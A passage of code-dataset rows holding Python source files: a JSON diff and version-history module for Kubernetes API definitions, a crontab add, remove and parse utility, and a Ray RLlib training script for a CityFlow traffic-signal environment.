if p not in parameters1:
added = result.get("P_ADDED", {})
added[p] = v
result["P_ADDED"] = added
return result
def _parse_version(version):
"""
Split version into major and minor
"""
vs = version.split(".")
if len(vs) != 2:
return -1, -1
return int(vs[0]), int(vs[1])
def history(data_type, fname, ver_to=None, ver_from=None):
"""Get history of a particular definition or operation.
:param data_type: "defs" or "ops"
:param fname: the base name of the file to compare.
:param ver_to: the last version number string, optional.
:param ver_from": the first version number string, optional.
"""
if ver_from is None:
ver_from = consts.API_VERSIONS[0][0]
if ver_to is None:
ver_to = consts.API_VERSIONS[-1][0]
vmajor0, vminor0 = _parse_version(ver_from)
vmajor1, vminor1 = _parse_version(ver_to)
if (vminor0 == vminor1) and (vmajor0 == vmajor1):
LOG.error("the two versions specified cannot be the same")
return None
minor_from = vminor0
minor_to = vminor0 + 1
key = os.path.splitext(fname)[0]
result = {}
while minor_to <= vminor1:
v0 = str(vmajor0) + "." + str(minor_from)
v1 = str(vmajor1) + "." + str(minor_to)
file0 = os.path.join(helpers.DATA_PATH, v0, data_type, fname)
file1 = os.path.join(helpers.DATA_PATH, v1, data_type, fname)
if not os.path.isfile(file0) and os.path.isfile(file1):
result[v1] = {"status": "ADDED"}
elif not os.path.isfile(file1) and os.path.isfile(file0):
result[v1] = {"status": "DELETED"}
else:
if data_type == "defs":
res = compare([v0, v1], file0, file1)
# The following is jsonpatch, the difference generated for
# description fields is not good. We can improve the
# module to generate something similar to JSON Patch format.
# j1 = jsonutil.load_json(file0, v0, root=".")
# j2 = jsonutil.load_json(file1, v1, root=".")
# d = jsonpatch.JsonPatch.from_diff(j1, j2)
# res = json.loads(d.to_string())
elif data_type == "ops":
res = compare_ops([v0, v1], [key])
if res:
result[v1] = {"status": "CHANGED", "changes": res}
minor_from += 1
minor_to += 1
return result
def _history(ver0, ver1):
# 1. handle definitions
defs = {}
d0 = {}
d1 = {}
# 1.1 first round scan
for k, v in helpers.DATA["definitions"].items():
for r in v.get(ver0, []):
appears_in = v.get("appearsIn", {}).get(ver0, [])
data = {
"id": r["id"],
"appearsIn": appears_in,
}
d0[(r["group"], r["version"], k)] = data
for r in v.get(ver1, []):
appears_in = v.get("appearsIn", {}).get(ver0, [])
data = {
"id": r["id"],
"appearsIn": appears_in,
}
d1[(r["group"], r["version"], k)] = data
# 1.2 second round scan
for gvk, v in d0.items():
if gvk not in d1: # dropped
defs[gvk] = v
defs[gvk]["status"] = "Removed"
continue
if settings.configured:
fmt = settings.DATA_DIR + "/{}/defs/{}.json"
else:
fmt = "data/{}/defs/{}.json"
f0 = fmt.format(ver0, v["id"])
f1 = fmt.format(ver1, v["id"])
diff = compare([ver0, ver1], f0, f1, recursive=False)
if diff is None:
continue
if len(diff) == 0:
continue
# definition changed
defs[gvk] = v
defs[gvk]["status"] = "Changed"
# 1.3 third round scan, for added definitions
for gvk, v in d1.items():
if gvk in d0:
continue
defs[gvk] = v
defs[gvk]["status"] = "Added"
# 2. handle operations
ops = []
# 2.1 check status of all operations
for k, v in helpers.DATA["operations"].items():
versions = v.get("versions", [])
status = None
if (ver0 in versions) and (ver1 not in versions):
status = "Removed"
elif (ver0 not in versions) and (ver1 in versions):
status = "Added"
elif (ver0 in versions) and (ver1 in versions):
diff = compare_ops([ver0, ver1], [k])
if diff is None:
continue
if len(diff) == 0:
continue
status = "Changed"
if status is None:
continue
gv_list = v["group_version"].split("/")
ops.append({
"status": status,
"id": k,
"group": gv_list[0],
"version": gv_list[-1],
"op": v["op_type"],
"target": v["target"],
"type": v["type"],
"description": v["description"],
})
# 2.2 sort ops by group and version
sorted_ops = sorted(ops, key=lambda k: (k["group"], k["op"]))
return {
"DEFS": defs,
"OPS": sorted_ops
}
def api_history(ver_to, ver_from=None):
# TODO: enable ver_from
vmajor, vminor1 = _parse_version(ver_to)
vminor0 = vminor1 - 1
minor_from = vminor0
minor_to = vminor0 + 1
result = {}
while minor_to <= vminor1:
v0 = str(vmajor) + "." + str(minor_from)
v1 = str(vmajor) + "." + str(minor_to)
result[(v0, v1)] = _history(v0, v1)
minor_from += 1
minor_to += 1
return result
| <filename>kab/kab/core/jsondiff.py
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import copy
import logging
import os
from django.conf import settings
from kab import consts
from kab.core import helpers
from kab.core import jsonutil
LOG = logging.getLogger(__name__)
class Diff(object):
def __init__(self, first, second, with_values=False):
self.difference = []
self.seen = []
self.check(first, second, with_values=with_values)
def check(self, first, second, path='', with_values=False):
if with_values and second is not None:
if not isinstance(first, type(second)):
message = '%s;; %s||%s' % (path, type(first).__name__,
type(second).__name__)
self.save("TYPE", message)
if isinstance(first, dict):
for key in first:
# the first part of path must not have trailing dot.
if len(path) == 0:
new_path = key
else:
new_path = "%s.%s" % (path, key)
message = new_path
if isinstance(second, dict):
if key in second:
sec = second[key]
else:
# key only in the first
self.save("PATH", message)
# prevent further values checking.
sec = None
# recursive call
if sec is not None:
self.check(first[key], sec, path=new_path,
with_values=with_values)
else:
# second is not dict.
# every key from first goes to the difference
self.save("PATH", message)
self.check(first[key], second, path=new_path,
with_values=with_values)
# if object is list, loop over it and check.
elif isinstance(first, list):
if not isinstance(second, list):
type1 = type(first).__name__
type2 = type(second).__name__
msg = '%s;; %s||%s' % (path, type1, type2)
self.save("TYPE", msg)
return
# process simple type
if not isinstance(first[0], (dict, list)):
first = sorted(first)
second = sorted(second)
if first != second:
msg = "%s;; %s||%s" % (path, first, second)
self.save("VALUE", msg)
return
for index, item in enumerate(first):
new_path = "%s[%s]" % (path, index)
sec = None
try:
sec = second[index]
self.check(item, sec, path=new_path,
with_values=with_values)
except (IndexError, KeyError):
msg = '%s;; %s||' % (new_path, str(item))
self.save("VALUE", msg)
# not list, not dict.
# check for equality (only if with_values is True) and return.
else:
if with_values and second is not None:
if first != second:
msg = "%s;; %s||%s" % (path, first, second)
self.save("VALUE", msg)
return
def save(self, kind, message):
if message not in self.difference:
self.seen.append(message)
self.difference.append((kind, message))
def compare_data(json1, json2):
"""Return the difference between two JSON.
The result looks like:
{
"ADDED": [
"foo.bar",
"zoo"
],
"REMOVED": [
"car.path[*].field"
],
"DESCRIPTION": {
"field.path1": {
"BEFORE": "text1",
"AFTER": "text2"
},
"(The resource)": {
"BEFORE": "old text",
"AFTER": "new text"
}
},
"CHANGED": [
"field.path": {
"BEFORE": "something",
"AFTER": "else"
}
]
}
"""
# first round check removed properties and changed values
diff1 = Diff(json1, json2, True).difference
# second round check newly added properties
diff2 = Diff(json2, json1, False).difference
diffs = []
for kind, message in diff1:
newType = "REMOVED" if kind == "PATH" else "CHANGED"
diffs.append({'type': newType, 'message': message})
for kind, message in diff2:
# ignore value changes
if kind == "VALUE":
continue
diffs.append({'type': "ADDED", 'message': message})
result = {}
for diff in diffs:
key = diff['type']
value = diff['message']
if (key == "CHANGED"):
key_vals = value.split(';;')
vals = key_vals[1].split('||')
keypath = key_vals[0].replace("properties.", "")
keypath = keypath.replace(".items.", "[*].")
if keypath.endswith(".description"):
key = "DESCRIPTION"
keypath = keypath[:-12]
elif keypath == "description":
key = "DESCRIPTION"
keypath = "(The Resource)"
value = {
keypath: {
"BEFORE": vals[0].strip(),
"AFTER": vals[1].strip(),
}
}
else:
# handle pseudo jsonpath for object properties and array items
value = value.replace("properties.", "")
value = value.replace(".items.", "[*].")
out_vals = result.get(key)
if (out_vals):
out_vals.append(value)
result[key] = out_vals
else:
result[key] = [value]
return result
def compare(apis, file1, file2, root=None, recursive=True):
"""Compare two JSON files.
:param apis: The APIs for the two files.
:param file1: Name for the first definition file.
:param file2: Name for the second definition file.
:returns: None if either one of the data cannot be loaded.
"""
json1 = jsonutil.load_json(file1, apis[0], root=root, recursive=recursive)
if json1 is None:
return None
json2 = jsonutil.load_json(file2, apis[-1], root=root, recursive=recursive)
if json2 is None:
return None
return compare_data(json1, json2)
def _definition_filename(api, group, version, kind, root=None):
if root is None:
if settings.configured:
fmt = settings.DATA_DIR + "/{}/defs/{}.json"
else:
fmt = "data/{}/defs/{}.json"
else:
fmt = root + "/{}/defs/{}.json"
if kind == "Info":
fn = "io.k8s.apimachinery.pkg.version.Info"
elif kind == "IntOrString":
fn = "io.k8s.apimachinery.pkg.util.intstr.IntOrString"
elif kind == "RawExtension":
fn = "io.k8s.apimachinery.pkg.runtime.RawExtension"
elif kind == "Quantity":
fn = "io.k8s.apimachinery.pkg.api.resource.Quantity"
else:
fn = ".".join([group, version, kind])
return fmt.format(api, fn)
def compare_defs(apis, groups, versions, kinds, root=None):
file0 = _definition_filename(apis[0], groups[0], versions[0], kinds[0])
file1 = _definition_filename(apis[-1], groups[-1], versions[-1], kinds[-1])
return compare(apis, file0, file1, root=root)
def _populate_parameters(apiv, param_list):
param_dict = helpers.parameters(apiv)
data = {}
for p in param_list:
if "$ref" not in p:
data[p["name"]] = p
continue
pref = p.pop("$ref")
param_name = pref[13:]
if param_name not in param_dict:
LOG.warning("Parameter %s not found!", param_name)
continue
item = copy.deepcopy(p)
item.update(param_dict.get(param_name))
data[item["name"]] = item
return collections.OrderedDict(sorted(data.items()))
def compare_ops(apis, opids, root=None):
"""Returns the diff between any two operations.
The returned result looks like:
{
/* basic JSON diff for operation definition JSON */
"P_ADDED": {
"p1": "<HTML formatted text>",
"p2": "<HTML formatted desc>"
},
"P_REMOVED": {
"p0": "<HTML formatted text>"
},
"P_CHANGED": {
"p3": {
"BEFORE": "raw data",
"AFTER": "raw data"
}
}
"""
if root is None:
fmt = helpers.DATA_PATH + "/{}/ops/{}.json"
else:
fmt = root + "/{}/ops/{}.json"
file0 = fmt.format(apis[0], opids[0])
file1 = fmt.format(apis[-1], opids[-1])
json1 = jsonutil.load_json(file0, apis[0], recursive=False)
if json1 is None:
return None
json2 = jsonutil.load_json(file1, apis[-1], recursive=False)
if json2 is None:
return None
# basic JSON diff
params1 = json1.pop("parameters", [])
params2 = json2.pop("parameters", [])
result = compare_data(json1, json2)
# handle the parameters
parameters1 = _populate_parameters(apis[0], params1)
parameters2 = _populate_parameters(apis[-1], params2)
for p, v in parameters1.items():
if p not in parameters2:
removed = result.get("P_REMOVED", {})
removed[p] = v
result["P_REMOVED"] = removed
elif parameters1[p] != parameters2[p]:
changed = result.get("P_CHANGED", {})
items1 = sorted(parameters1[p].items())
items2 = sorted(parameters2[p].items())
changed[p] = {
"BEFORE": collections.OrderedDict(sorted(items1)),
"AFTER": collections.OrderedDict(sorted(items2)),
}
result["P_CHANGED"] = changed
for p, v in parameters2.items():
if p not in parameters1:
added = result.get("P_ADDED", {})
added[p] = v
result["P_ADDED"] = added
return result
def _parse_version(version):
"""
Split version into major and minor
"""
vs = version.split(".")
if len(vs) != 2:
return -1, -1
return int(vs[0]), int(vs[1])
def history(data_type, fname, ver_to=None, ver_from=None):
"""Get history of a particular definition or operation.
:param data_type: "defs" or "ops"
:param fname: the base name of the file to compare.
:param ver_to: the last version number string, optional.
:param ver_from": the first version number string, optional.
"""
if ver_from is None:
ver_from = consts.API_VERSIONS[0][0]
if ver_to is None:
ver_to = consts.API_VERSIONS[-1][0]
vmajor0, vminor0 = _parse_version(ver_from)
vmajor1, vminor1 = _parse_version(ver_to)
if (vminor0 == vminor1) and (vmajor0 == vmajor1):
LOG.error("the two versions specified cannot be the same")
return None
minor_from = vminor0
minor_to = vminor0 + 1
key = os.path.splitext(fname)[0]
result = {}
while minor_to <= vminor1:
v0 = str(vmajor0) + "." + str(minor_from)
v1 = str(vmajor1) + "." + str(minor_to)
file0 = os.path.join(helpers.DATA_PATH, v0, data_type, fname)
file1 = os.path.join(helpers.DATA_PATH, v1, data_type, fname)
if not os.path.isfile(file0) and os.path.isfile(file1):
result[v1] = {"status": "ADDED"}
elif not os.path.isfile(file1) and os.path.isfile(file0):
result[v1] = {"status": "DELETED"}
else:
if data_type == "defs":
res = compare([v0, v1], file0, file1)
# The following is jsonpatch, the difference generated for
# description fields is not good. We can improve the
# module to generate something similar to JSON Patch format.
# j1 = jsonutil.load_json(file0, v0, root=".")
# j2 = jsonutil.load_json(file1, v1, root=".")
# d = jsonpatch.JsonPatch.from_diff(j1, j2)
# res = json.loads(d.to_string())
elif data_type == "ops":
res = compare_ops([v0, v1], [key])
if res:
result[v1] = {"status": "CHANGED", "changes": res}
minor_from += 1
minor_to += 1
return result
def _history(ver0, ver1):
# 1. handle definitions
defs = {}
d0 = {}
d1 = {}
# 1.1 first round scan
for k, v in helpers.DATA["definitions"].items():
for r in v.get(ver0, []):
appears_in = v.get("appearsIn", {}).get(ver0, [])
data = {
"id": r["id"],
"appearsIn": appears_in,
}
d0[(r["group"], r["version"], k)] = data
for r in v.get(ver1, []):
appears_in = v.get("appearsIn", {}).get(ver0, [])
data = {
"id": r["id"],
"appearsIn": appears_in,
}
d1[(r["group"], r["version"], k)] = data
# 1.2 second round scan
for gvk, v in d0.items():
if gvk not in d1: # dropped
defs[gvk] = v
defs[gvk]["status"] = "Removed"
continue
if settings.configured:
fmt = settings.DATA_DIR + "/{}/defs/{}.json"
else:
fmt = "data/{}/defs/{}.json"
f0 = fmt.format(ver0, v["id"])
f1 = fmt.format(ver1, v["id"])
diff = compare([ver0, ver1], f0, f1, recursive=False)
if diff is None:
continue
if len(diff) == 0:
continue
# definition changed
defs[gvk] = v
defs[gvk]["status"] = "Changed"
# 1.3 third round scan, for added definitions
for gvk, v in d1.items():
if gvk in d0:
continue
defs[gvk] = v
defs[gvk]["status"] = "Added"
# 2. handle operations
ops = []
# 2.1 check status of all operations
for k, v in helpers.DATA["operations"].items():
versions = v.get("versions", [])
status = None
if (ver0 in versions) and (ver1 not in versions):
status = "Removed"
elif (ver0 not in versions) and (ver1 in versions):
status = "Added"
elif (ver0 in versions) and (ver1 in versions):
diff = compare_ops([ver0, ver1], [k])
if diff is None:
continue
if len(diff) == 0:
continue
status = "Changed"
if status is None:
continue
gv_list = v["group_version"].split("/")
ops.append({
"status": status,
"id": k,
"group": gv_list[0],
"version": gv_list[-1],
"op": v["op_type"],
"target": v["target"],
"type": v["type"],
"description": v["description"],
})
# 2.2 sort ops by group and version
sorted_ops = sorted(ops, key=lambda k: (k["group"], k["op"]))
return {
"DEFS": defs,
"OPS": sorted_ops
}
def api_history(ver_to, ver_from=None):
# TODO: enable ver_from
vmajor, vminor1 = _parse_version(ver_to)
vminor0 = vminor1 - 1
minor_from = vminor0
minor_to = vminor0 + 1
result = {}
while minor_to <= vminor1:
v0 = str(vmajor) + "." + str(minor_from)
v1 = str(vmajor) + "." + str(minor_to)
result[(v0, v1)] = _history(v0, v1)
minor_from += 1
minor_to += 1
return result
| en | 0.74574 | # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and # limitations under the License. # the first part of path must not have trailing dot. # key only in the first # prevent further values checking. # recursive call # second is not dict. # every key from first goes to the difference # if object is list, loop over it and check. # process simple type # not list, not dict. # check for equality (only if with_values is True) and return. Return the difference between two JSON. The result looks like: { "ADDED": [ "foo.bar", "zoo" ], "REMOVED": [ "car.path[*].field" ], "DESCRIPTION": { "field.path1": { "BEFORE": "text1", "AFTER": "text2" }, "(The resource)": { "BEFORE": "old text", "AFTER": "new text" } }, "CHANGED": [ "field.path": { "BEFORE": "something", "AFTER": "else" } ] } # first round check removed properties and changed values # second round check newly added properties # ignore value changes # handle pseudo jsonpath for object properties and array items Compare two JSON files. :param apis: The APIs for the two files. :param file1: Name for the first definition file. :param file2: Name for the second definition file. :returns: None if either one of the data cannot be loaded. Returns the diff between any two operations. The returned result looks like: { /* basic JSON diff for operation definition JSON */ "P_ADDED": { "p1": "<HTML formatted text>", "p2": "<HTML formatted desc>" }, "P_REMOVED": { "p0": "<HTML formatted text>" }, "P_CHANGED": { "p3": { "BEFORE": "raw data", "AFTER": "raw data" } } # basic JSON diff # handle the parameters Split version into major and minor Get history of a particular definition or operation. :param data_type: "defs" or "ops" :param fname: the base name of the file to compare. :param ver_to: the last version number string, optional. :param ver_from": the first version number string, optional. # The following is jsonpatch, the difference generated for # description fields is not good. We can improve the # module to generate something similar to JSON Patch format. # j1 = jsonutil.load_json(file0, v0, root=".") # j2 = jsonutil.load_json(file1, v1, root=".") # d = jsonpatch.JsonPatch.from_diff(j1, j2) # res = json.loads(d.to_string()) # 1. handle definitions # 1.1 first round scan # 1.2 second round scan # dropped # definition changed # 1.3 third round scan, for added definitions # 2. handle operations # 2.1 check status of all operations # 2.2 sort ops by group and version # TODO: enable ver_from | 2.183168 | 2 |
utils/cron_util.py | haodaohong/zimt8 | 1 | 6616685 | # -*- coding: utf-8 -*-
import re
from datetime import datetime
from croniter import croniter
from utils.common_util import get_except
from utils.file_util import file_reads, file_writes
def crontab_item_remove(crontab_item, log_user='root'):
"""
|##desc: 删除计划任务,需要ROOT权限
|##:param: log_user 添加到什么用户下面去
|##:return: None
|##@author: jhuang
|##@time:9/1/2017
"""
crontabFile = "/var/spool/cron/%s" % (log_user)
crontabs = file_reads(crontabFile)
crontabsList = crontab_parse(crontabs, True)
if crontab_item in crontabsList:
crontabsList.remove(crontab_item)
crontabs = '\n'.join(crontabsList)
file_writes(crontabFile, crontabs + '\n')
def crontab_item_add(crontab_item, log_user='root'):
"""
|##desc: 添加计划任务,需要ROOT权限
|##:param: log_user 添加到什么用户下面去
|##:return: None
|##@author: jhuang
|##@time:9/1/2017
"""
crontabFile = "/var/spool/cron/%s" % (log_user)
crontabs = file_reads(crontabFile)
crontabsList = crontab_parse(crontabs, True)
if crontab_item in crontabsList:
crontabsList.remove(crontab_item)
crontabsList.append(crontab_item)
crontabs = '\n'.join(crontabsList)
file_writes(crontabFile, crontabs + '\n')
def get_crond_next_time(interval, count=5):
"""
|##@Function purpose:计算下次执行时间
|##@Parameter description:None
|##@Return value:None
|##@Function logic:None
|##@author: jhuang
|##@time:
"""
timeList = []
iter = croniter(interval)
for i in range(count):
next_date = iter.get_next(datetime)
next_date = datetime.strftime(next_date, '%Y-%m-%d %H:%M:%S')
timeList.append(next_date)
return timeList
def crontab_parse(crontabs, LineList=False):
"""
|##@Function purpose:解析Crontab
|##@Parameter description:None
|##@Return value:None
|##@Function logic:None
|##@author: jhuang
|##@time:
"""
try:
print crontabs
crontabs = re.findall('^(?:\d+|\*).*?\s+.*?\s+.*?\s+.*?\s+.*?\s+.*', crontabs, re.M)
crontab_list = []
if LineList:
for r in crontabs:
crontab_list.append(r.strip().strip('\n').strip('\r'))
return crontab_list
print crontabs
for crontab in crontabs:
dic = {}
# print crontab
dic['interval'] = str(
re.findall('(^(?:\d+|\*).*?\s+.*?\s+.*?\s+.*?\s+.*?\s+)(.*)', crontab, re.M)[0][0]).strip().strip(
'\n').strip('\r')
dic['what'] = str(
re.findall('(^(?:\d+|\*).*?\s+.*?\s+.*?\s+.*?\s+.*?\s+)(.*)', crontab, re.M)[0][1]).strip().strip(
'\n').strip('\r')
crontab = crontab.replace(' ', '')
crontab_list.append(dic)
return crontab_list
except Exception as e:
get_except(e)
return []
| # -*- coding: utf-8 -*-
import re
from datetime import datetime
from croniter import croniter
from utils.common_util import get_except
from utils.file_util import file_reads, file_writes
def crontab_item_remove(crontab_item, log_user='root'):
"""
|##desc: 删除计划任务,需要ROOT权限
|##:param: log_user 添加到什么用户下面去
|##:return: None
|##@author: jhuang
|##@time:9/1/2017
"""
crontabFile = "/var/spool/cron/%s" % (log_user)
crontabs = file_reads(crontabFile)
crontabsList = crontab_parse(crontabs, True)
if crontab_item in crontabsList:
crontabsList.remove(crontab_item)
crontabs = '\n'.join(crontabsList)
file_writes(crontabFile, crontabs + '\n')
def crontab_item_add(crontab_item, log_user='root'):
"""
|##desc: 添加计划任务,需要ROOT权限
|##:param: log_user 添加到什么用户下面去
|##:return: None
|##@author: jhuang
|##@time:9/1/2017
"""
crontabFile = "/var/spool/cron/%s" % (log_user)
crontabs = file_reads(crontabFile)
crontabsList = crontab_parse(crontabs, True)
if crontab_item in crontabsList:
crontabsList.remove(crontab_item)
crontabsList.append(crontab_item)
crontabs = '\n'.join(crontabsList)
file_writes(crontabFile, crontabs + '\n')
def get_crond_next_time(interval, count=5):
"""
|##@Function purpose:计算下次执行时间
|##@Parameter description:None
|##@Return value:None
|##@Function logic:None
|##@author: jhuang
|##@time:
"""
timeList = []
iter = croniter(interval)
for i in range(count):
next_date = iter.get_next(datetime)
next_date = datetime.strftime(next_date, '%Y-%m-%d %H:%M:%S')
timeList.append(next_date)
return timeList
def crontab_parse(crontabs, LineList=False):
"""
|##@Function purpose:解析Crontab
|##@Parameter description:None
|##@Return value:None
|##@Function logic:None
|##@author: jhuang
|##@time:
"""
try:
print crontabs
crontabs = re.findall('^(?:\d+|\*).*?\s+.*?\s+.*?\s+.*?\s+.*?\s+.*', crontabs, re.M)
crontab_list = []
if LineList:
for r in crontabs:
crontab_list.append(r.strip().strip('\n').strip('\r'))
return crontab_list
print crontabs
for crontab in crontabs:
dic = {}
# print crontab
dic['interval'] = str(
re.findall('(^(?:\d+|\*).*?\s+.*?\s+.*?\s+.*?\s+.*?\s+)(.*)', crontab, re.M)[0][0]).strip().strip(
'\n').strip('\r')
dic['what'] = str(
re.findall('(^(?:\d+|\*).*?\s+.*?\s+.*?\s+.*?\s+.*?\s+)(.*)', crontab, re.M)[0][1]).strip().strip(
'\n').strip('\r')
crontab = crontab.replace(' ', '')
crontab_list.append(dic)
return crontab_list
except Exception as e:
get_except(e)
return []
| zh | 0.67748 | # -*- coding: utf-8 -*- |##desc: 删除计划任务,需要ROOT权限 |##:param: log_user 添加到什么用户下面去 |##:return: None |##@author: jhuang |##@time:9/1/2017 |##desc: 添加计划任务,需要ROOT权限 |##:param: log_user 添加到什么用户下面去 |##:return: None |##@author: jhuang |##@time:9/1/2017 |##@Function purpose:计算下次执行时间 |##@Parameter description:None |##@Return value:None |##@Function logic:None |##@author: jhuang |##@time: |##@Function purpose:解析Crontab |##@Parameter description:None |##@Return value:None |##@Function logic:None |##@author: jhuang |##@time: # print crontab | 2.717633 | 3 |
Single_Agent/ScalableArchitecture/train.py | hrushikeshjadhav9/Multi-Commander | 79 | 6616686 | <gh_stars>10-100
import os
import argparse
import json
import logging
from datetime import datetime
import ray
import ray.rllib.agents.a3c as a3c
import ray.rllib.agents.dqn as dqn
import ray.rllib.agents.impala as impala
import ray.rllib.agents.ppo as ppo
from gym_cityflow.envs.cityflow_env import CityflowGymEnv
from ray import tune
from ray.rllib.agents.registry import get_agent_class
from ray.tune import grid_search, register_env
from utility import parse_roadnet
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
def gen_env_config():
# preparing config
# for environment
with open(args.config) as f:
config = json.load(f)
with open(config['cityflow_config_file']) as f:
cityflow_config = json.load(f)
roadnet_file = cityflow_config['dir'] + cityflow_config['roadnetFile']
config["num_step"] = args.num_step
config["state_time_span"] = args.state_time_span
config["time_span"] = args.time_span
config["lane_phase_info"] = parse_roadnet(roadnet_file)
intersection_id = list(config['lane_phase_info'].keys())[0]
# intersection_id = list(config['lane_phase_info'].keys())
config["intersection_id"] = intersection_id
phase_list = config['lane_phase_info'][intersection_id]['phase']
# logging.info(phase_list)
config["state_size"] = len(config['lane_phase_info'][intersection_id]['start_lane'])
config["action_size"] = len(phase_list)
config["batch_size"] = args.batch_size
return config
def gen_trainer_config(env_config):
# if args.algo == 'DQN':
# config = dqn.DEFAULT_CONFIG.copy()
# elif args.algo == 'PPO':
# config = ppo.DEFAULT_CONFIG.copy()
# elif args.algo == 'APEX':
# config = dqn.apex.APEX_DEFAULT_CONFIG.copy()
# elif args.algo == 'APPO':
# config = ppo.appo.DEFAULT_CONFIG.copy()
# elif args.algo == 'IMPALA':
# config = impala.DEFAULT_CONFIG.copy()
# elif args.algo == 'A3C':
# config = a3c.DEFAULT_CONFIG.copy()
# elif args.algo == 'A2C':
# config = a3c.a2c.A2C_DEFAULT_CONFIG.copy()
# else:
# assert 0 == 1, 'Unexpected args.algo.'
config = {"ignore_worker_failures": True,
"env": CityflowGymEnv, "env_config": env_config,
"num_gpus": 0, "num_workers": 24,
"num_cpus_per_worker": 1, # "num_gpus_per_worker": 0.03125,
"num_cpus_for_driver": 1}
# config['lr'] = grid_search([1e-2, 1e-3, 1e-4])
return config
def training_workflow(config_, reporter):
# build trainer
cls = get_agent_class(args.algo)
trainer = cls(env=CityflowGymEnv, config=config_)
for i in range(args.epoch):
res = trainer.train()
reporter(**res)
# if i % 100 == 0:
# checkpoint = trainer.save()
# print(f'checkpoint saved at {checkpoint}')
def create_parser():
parser = argparse.ArgumentParser()
parser.add_argument('--config', type=str, default='config/global_config.json', help='config file')
parser.add_argument('--algo', type=str, default='DQN',
choices=['DQN', 'PPO', 'APEX', 'APPO', 'IMPALA', 'A3C', 'A2C'])
parser.add_argument('--inference', action="store_true", help='inference or training')
parser.add_argument('--ckpt', type=str, help='inference or training')
parser.add_argument('--epoch', type=int, default=10, help='number of training epochs')
parser.add_argument('--num_step', type=int, default=10 ** 3,
help='number of time steps for one episode, and for inference')
parser.add_argument('--save_freq', type=int, default=100, help='model saving frequency')
parser.add_argument('--batch_size', type=int, default=128, help='model saving frequency')
parser.add_argument('--state_time_span', type=int, default=5, help='state interval to receive long term state')
parser.add_argument('--time_span', type=int, default=30, help='time interval to collect data')
return parser
ray.init()
parser = create_parser()
args = parser.parse_args()
env_config = gen_env_config()
trainer_config = gen_trainer_config(env_config)
# register_env('cityflow_single_agent',
# lambda config_: CityflowGymEnv(config_))
tune.run(
args.algo,
checkpoint_freq=args.save_freq,
checkpoint_at_end=True,
stop={'training_iteration': args.epoch},
config=trainer_config,
)
| import os
import argparse
import json
import logging
from datetime import datetime
import ray
import ray.rllib.agents.a3c as a3c
import ray.rllib.agents.dqn as dqn
import ray.rllib.agents.impala as impala
import ray.rllib.agents.ppo as ppo
from gym_cityflow.envs.cityflow_env import CityflowGymEnv
from ray import tune
from ray.rllib.agents.registry import get_agent_class
from ray.tune import grid_search, register_env
from utility import parse_roadnet
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
def gen_env_config():
# preparing config
# for environment
with open(args.config) as f:
config = json.load(f)
with open(config['cityflow_config_file']) as f:
cityflow_config = json.load(f)
roadnet_file = cityflow_config['dir'] + cityflow_config['roadnetFile']
config["num_step"] = args.num_step
config["state_time_span"] = args.state_time_span
config["time_span"] = args.time_span
config["lane_phase_info"] = parse_roadnet(roadnet_file)
intersection_id = list(config['lane_phase_info'].keys())[0]
# intersection_id = list(config['lane_phase_info'].keys())
config["intersection_id"] = intersection_id
phase_list = config['lane_phase_info'][intersection_id]['phase']
# logging.info(phase_list)
config["state_size"] = len(config['lane_phase_info'][intersection_id]['start_lane'])
config["action_size"] = len(phase_list)
config["batch_size"] = args.batch_size
return config
def gen_trainer_config(env_config):
# if args.algo == 'DQN':
# config = dqn.DEFAULT_CONFIG.copy()
# elif args.algo == 'PPO':
# config = ppo.DEFAULT_CONFIG.copy()
# elif args.algo == 'APEX':
# config = dqn.apex.APEX_DEFAULT_CONFIG.copy()
# elif args.algo == 'APPO':
# config = ppo.appo.DEFAULT_CONFIG.copy()
# elif args.algo == 'IMPALA':
# config = impala.DEFAULT_CONFIG.copy()
# elif args.algo == 'A3C':
# config = a3c.DEFAULT_CONFIG.copy()
# elif args.algo == 'A2C':
# config = a3c.a2c.A2C_DEFAULT_CONFIG.copy()
# else:
# assert 0 == 1, 'Unexpected args.algo.'
config = {"ignore_worker_failures": True,
"env": CityflowGymEnv, "env_config": env_config,
"num_gpus": 0, "num_workers": 24,
"num_cpus_per_worker": 1, # "num_gpus_per_worker": 0.03125,
"num_cpus_for_driver": 1}
# config['lr'] = grid_search([1e-2, 1e-3, 1e-4])
return config
def training_workflow(config_, reporter):
# build trainer
cls = get_agent_class(args.algo)
trainer = cls(env=CityflowGymEnv, config=config_)
for i in range(args.epoch):
res = trainer.train()
reporter(**res)
# if i % 100 == 0:
# checkpoint = trainer.save()
# print(f'checkpoint saved at {checkpoint}')
def create_parser():
parser = argparse.ArgumentParser()
parser.add_argument('--config', type=str, default='config/global_config.json', help='config file')
parser.add_argument('--algo', type=str, default='DQN',
choices=['DQN', 'PPO', 'APEX', 'APPO', 'IMPALA', 'A3C', 'A2C'])
parser.add_argument('--inference', action="store_true", help='inference or training')
parser.add_argument('--ckpt', type=str, help='inference or training')
parser.add_argument('--epoch', type=int, default=10, help='number of training epochs')
parser.add_argument('--num_step', type=int, default=10 ** 3,
help='number of time steps for one episode, and for inference')
parser.add_argument('--save_freq', type=int, default=100, help='model saving frequency')
parser.add_argument('--batch_size', type=int, default=128, help='model saving frequency')
parser.add_argument('--state_time_span', type=int, default=5, help='state interval to receive long term state')
parser.add_argument('--time_span', type=int, default=30, help='time interval to collect data')
return parser
ray.init()
parser = create_parser()
args = parser.parse_args()
env_config = gen_env_config()
trainer_config = gen_trainer_config(env_config)
# register_env('cityflow_single_agent',
# lambda config_: CityflowGymEnv(config_))
tune.run(
args.algo,
checkpoint_freq=args.save_freq,
checkpoint_at_end=True,
stop={'training_iteration': args.epoch},
config=trainer_config,
